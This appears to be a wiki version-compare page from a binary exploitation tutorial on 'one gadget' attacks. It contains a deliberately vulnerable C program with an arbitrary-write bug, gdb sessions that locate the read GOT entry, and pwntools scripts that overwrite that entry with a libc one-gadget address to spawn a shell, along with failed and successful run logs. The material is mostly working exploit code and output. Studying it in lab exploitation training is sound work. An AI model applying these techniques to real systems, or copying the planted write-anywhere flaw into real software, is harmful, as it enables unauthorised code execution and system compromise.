Page tree

Versions Compared

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
languagecpp
titleBabybaby.c
//gcc -fno-stack-protector -o onebaby onebaby.c -ldl
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <dlfcn.h>
 
char asdf[1024];

int main()
{
    long long index = 0;

    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
 
    read(0, &index, 1024);
    read(0, asdf+index, 8);
    read(0, &index, 1024);
}

...

Code Block
titleBreak points
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ gdb -q ./onebaby
Reading symbols from ./onebaby...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000000000400676 <+0>:	push   rbp
   0x0000000000400677 <+1>:	mov    rbp,rsp
   0x000000000040067a <+4>:	sub    rsp,0x10
   0x000000000040067e <+8>:	mov    QWORD PTR [rbp-0x10],0x0
   0x0000000000400686 <+16>:	mov    esi,0x400784
   0x000000000040068b <+21>:	mov    rdi,0xffffffffffffffff
   0x0000000000400692 <+28>:	call   0x400560 <dlsym@plt>
   0x0000000000400697 <+33>:	mov    QWORD PTR [rbp-0x8],rax
   0x000000000040069b <+37>:	mov    rax,QWORD PTR [rbp-0x8]
   0x000000000040069f <+41>:	mov    rsi,rax
   0x00000000004006a2 <+44>:	mov    edi,0x40078b
   0x00000000004006a7 <+49>:	mov    eax,0x0
   0x00000000004006ac <+54>:	call   0x400530 <printf@plt>
   0x00000000004006b1 <+59>:	lea    rax,[rbp-0x10]
   0x00000000004006b5 <+63>:	mov    edx,0x400
   0x00000000004006ba <+68>:	mov    rsi,rax
   0x00000000004006bd <+71>:	mov    edi,0x0
   0x00000000004006c2 <+76>:	call   0x400540 <read@plt>
   0x00000000004006c7 <+81>:	mov    rax,QWORD PTR [rbp-0x10]
   0x00000000004006cb <+85>:	add    rax,0x601080
   0x00000000004006d1 <+91>:	mov    edx,0x8
   0x00000000004006d6 <+96>:	mov    rsi,rax
   0x00000000004006d9 <+99>:	mov    edi,0x0
   0x00000000004006de <+104>:	call   0x400540 <read@plt>
   0x00000000004006e3 <+109>:	lea    rax,[rbp-0x10]
   0x00000000004006e7 <+113>:	mov    edx,0x400
   0x00000000004006ec <+118>:	mov    rsi,rax
   0x00000000004006ef <+121>:	mov    edi,0x0
   0x00000000004006f4 <+126>:	call   0x400540 <read@plt>
   0x00000000004006f9 <+131>:	mov    eax,0x0
   0x00000000004006fe <+136>:	leave  
   0x00000000004006ff <+137>:	ret    
End of assembler dump.
gdb-peda$ b *0x00000000004006c2
Breakpoint 1 at 0x4006c2
gdb-peda$ b *0x00000000004006de
Breakpoint 2 at 0x4006de
gdb-peda$ b *0x00000000004006f4
Breakpoint 3 at 0x4006f4
gdb-peda$

...

Code Block
titleFind vuln
gdb-peda$ r
Starting program: /home/lazenca0x0/Exploit/OneGadgets/onebaby 
Printf() address : 0x7ffff785e800
Breakpoint 1, 0x00000000004006c2 in main ()
gdb-peda$ ni
AAAAAAAAAAAAAAAA
0x00000000004006c7 in main ()
gdb-peda$ ni
0x00000000004006cb in main ()
gdb-peda$ x/i $rip
=> 0x4006cb <main+85>:	add    rax,0x601080
gdb-peda$ i r rax
rax            0x4141414141414141	0x4141414141414141
gdb-peda$ p/x 0x4141414141414141 + 0x601080
$6 = 0x4141414141a151c1
gdb-peda$ p/x 0xffffffffffffffff + 0x601080
$7 = 0x60107f

gdb-peda$ elfsymbol read
Detail symbol info
read@reloc = 0x1
read@plt = 0x400540
read@got = 0x601020
gdb-peda$ p/x 0x601020 - 0x601080
$8 = 0xffffffa0
gdb-peda$ p/x 0xffffffffffffffa0 + 0x601080
$9 = 0x601020
gdb-peda$ 

...

Code Block
languagepy
titleExploitexploit-1.py
from pwn import *

p = process('./onebaby')

p.recvuntil('Printf() address : ')
libcAddr = p.recvuntil('\n')
libcAddr = int(libcAddr,16)

libcBase = libcAddr - 0x55800
oneGadget = libcBase + 0x4526a 
inputValue = int(str(hex(oneGadget))[-4:],16)

log.info('libcBase Addr : '+hex(libcBase))
log.info('oneGadget Addr : '+hex(oneGadget))
log.info('Input value : '+hex(inputValue))

p.sendline(p64(0xffffffffffffffa0))
sleep(0.5)
p.sendline(p64(oneGadget))
p.interactive()

...

Code Block
titleFail!
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ python Exploit.py 
[+] Starting local process './onebaby': pid 17043
[*] libcBase Addr : 0x7f0dde749000
[*] oneGadget Addr : 0x7f0dde78e26a
[*] Input value : 0xe26a
[*] Switching to interactive mode
$ 
[*] Got EOF while reading in interactive
$ 
[*] Process './onebaby' stopped with exit code -11 (SIGSEGV) (pid 17043)
[*] Got EOF while sending in interactive
lazenca0x0@ubuntu:~/Exploit/OneGadgets$

...

Code Block
titleRun script
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ python Exploit.py 
[+] Starting local process './onebaby': pid 15978
[*] libcBase Addr : 0x7f930739d000
[*] oneGadget Addr : 0x7f93073e2216
[*] Input value : 0x2216
[*] Switching to interactive mode
$ 

...

Code Block
languagepy
titleExploitexploit-2.py
from pwn import *

p = process('./one')

p.recvuntil('Printf() address : ')
libcAddr = p.recvuntil('\n')
libcAddr = int(libcAddr,16)

libcBase = libcAddr - 0x55800
oneGadget = libcBase + 0x4526a 
inputValue = int(str(hex(oneGadget))[-4:],16)

log.info('libcBase Addr : '+hex(libcBase))
log.info('oneGadget Addr : '+hex(oneGadget))
log.info('Input value : '+hex(inputValue))

p.sendline(p64(0xffffffffffffffa8))
sleep(0.5)
p.sendline(p64(oneGadget))
p.interactive()

...

Code Block
titleSuccess!
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ python Exploitexploit-2.py 
[+] Starting local process './one': pid 18745
[*] libcBase Addr : 0x7f10b5ed8000
[*] oneGadget Addr : 0x7f10b5f1d26a
[*] Input value : 0xd26a
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ 

...